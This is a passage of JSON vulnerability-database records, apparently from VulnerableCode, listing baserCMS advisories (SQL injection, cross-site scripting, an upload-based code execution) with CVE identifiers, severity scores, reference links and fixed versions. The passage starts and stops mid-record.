v-4yp3-zbgf","summary":"baserCMS has an SQL injection vulnerability in its blog post functionality\nbaserCMS has a SQL injection vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nMalicious SQL may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_52157568\n\n### Credits\n\nMirai Matsumoto@Future Secure Wave, Inc.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27697","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02096","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27697"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27697","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27697"},{"reference_url":"https://github.com/advisories/GHSA-vh89-rjph-2g7p","reference_id":"GHSA-vh89-rjph-2g7p","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-vh89-rjph-2g7p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-27697","GHSA-vh89-rjph-2g7p"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56066?format=json","vulnerability_id":"VCID-khft-xvrw-g3dr","summary":"baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request\nXSS vulnerability in HTTP 400 Bad Request to baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46995","reference_id":"","reference_type":"","scores":[{"value":"0.0087","scoring_system":"epss","scoring_elements":"0.75582","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46995"},{"reference_url":"https://basercms.net/security/JVN_00876083","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN_00876083"},{"reference_url":"https://basercms.net/security/JVN_06274755","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/"}],"url":"https://basercms.net/security/JVN_06274755"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46995","reference_id":"CVE-2024-46995","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46995"},{"reference_url":"https://github.com/advisories/GHSA-mr7q-fv7j-jcgv","reference_id":"GHSA-mr7q-fv7j-jcgv","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-mr7q-fv7j-jcgv"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv","reference_id":"GHSA-mr7q-fv7j-jcgv","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83045?format=json","purl":"pkg:composer/baserproject/basercms@5.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"}],"aliases":["CVE-2024-46995","GHSA-mr7q-fv7j-jcgv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110302?format=json","vulnerability_id":"VCID-kmpp-6j49-pqfz","summary":"baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability\nThere is a cross-site scripting vulnerability on the management system of baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.1 and earlier versions.\n\n### Vulnerability\nExecution of malicious JavaScript code may alter the display of the page or leak cookie information.\n- In Favorite registration (CVE-2022-39325)\n- In Permission Settings (CVE-2022-41994)\n- In User group management (CVE-2022-42486)\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\n### Credits\n- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.\n- YUYA KOTAKE@CARTA HOLDINGS, INC.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-39325","reference_id":"","reference_type":"","scores":[{"value":"0.00687","scoring_system":"epss","scoring_elements":"0.72163","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00687","scoring_system":"epss","scoring_elements":"0.72122","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-39325"},{"reference_url":"https://basercms.net/security/JVN_53682526","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/"}],"url":"https://basercms.net/security/JVN_53682526"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-39325","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-39325"},{"reference_url":"https://github.com/advisories/GHSA-395x-wv32-44v5","reference_id":"GHSA-395x-wv32-44v5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-395x-wv32-44v5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/146599?format=json","purl":"pkg:composer/baserproject/basercms@4.7.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2"}],"aliases":["CVE-2022-39325","GHSA-395x-wv32-44v5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kmpp-6j49-pqfz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56058?format=json","vulnerability_id":"VCID-mfm9-gsh3-ubg8","summary":"baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature\nXSS vulnerability in Blog posts feature to baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46996","reference_id":"","reference_type":"","scores":[{"value":"0.01236","scoring_system":"epss","scoring_elements":"0.79576","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46996"},{"reference_url":"https://basercms.net/security/JVN_00876083","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/"}],"url":"https://basercms.net/security/JVN_00876083"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46996","reference_id":"CVE-2024-46996","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46996"},{"reference_url":"https://github.com/advisories/GHSA-66jv-qrm3-vvfg","reference_id":"GHSA-66jv-qrm3-vvfg","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-66jv-qrm3-vvfg"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg","reference_id":"GHSA-66jv-qrm3-vvfg","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83045?format=json","purl":"pkg:composer/baserproject/basercms@5.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"}],"aliases":["CVE-2024-46996","GHSA-66jv-qrm3-vvfg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47109?format=json","vulnerability_id":"VCID-nxrf-64er-xbfx","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nbaserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-26128","reference_id":"","reference_type":"","scores":[{"value":"0.02281","scoring_system":"epss","scoring_elements":"0.85006","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-26128"},{"reference_url":"https://basercms.net/security/JVN_73283159","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/"}],"url":"https://basercms.net/security/JVN_73283159"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/"}],"url":"https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-26128","reference_id":"CVE-2024-26128","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-26128"},{"reference_url":"https://github.com/advisories/GHSA-jjxq-m8h3-4vw5","reference_id":"GHSA-jjxq-m8h3-4vw5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jjxq-m8h3-4vw5"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5","reference_id":"GHSA-jjxq-m8h3-4vw5","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69105?format=json","purl":"pkg:composer/baserproject/basercms@5.0.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9"}],"aliases":["CVE-2024-26128","GHSA-jjxq-m8h3-4vw5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56065?format=json","vulnerability_id":"VCID-p695-t9ye-v3ga","summary":"baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature\nXSS vulnerability in Edit Email Form Settings Feature to baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46998","reference_id":"","reference_type":"","scores":[{"value":"0.01064","scoring_system":"epss","scoring_elements":"0.7805","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46998"},{"reference_url":"https://basercms.net/security/JVN_00876083","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN_00876083"},{"reference_url":"https://basercms.net/security/JVN_98693329","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/"}],"url":"https://basercms.net/security/JVN_98693329"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46998","reference_id":"CVE-2024-46998","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46998"},{"reference_url":"https://github.com/advisories/GHSA-p3m2-mj3j-j49x","reference_id":"GHSA-p3m2-mj3j-j49x","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-p3m2-mj3j-j49x"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x","reference_id":"GHSA-p3m2-mj3j-j49x","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83045?format=json","purl":"pkg:composer/baserproject/basercms@5.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"}],"aliases":["CVE-2024-46998","GHSA-p3m2-mj3j-j49x"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52930?format=json","vulnerability_id":"VCID-p6nr-eu91-53b4","summary":"Cross-site Scripting\nbaserCMS is affected by Cross Site Scripting (XSS) and Remote Code Execution (RCE). This may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file. The affected components are `ThemeFilesController.php` and 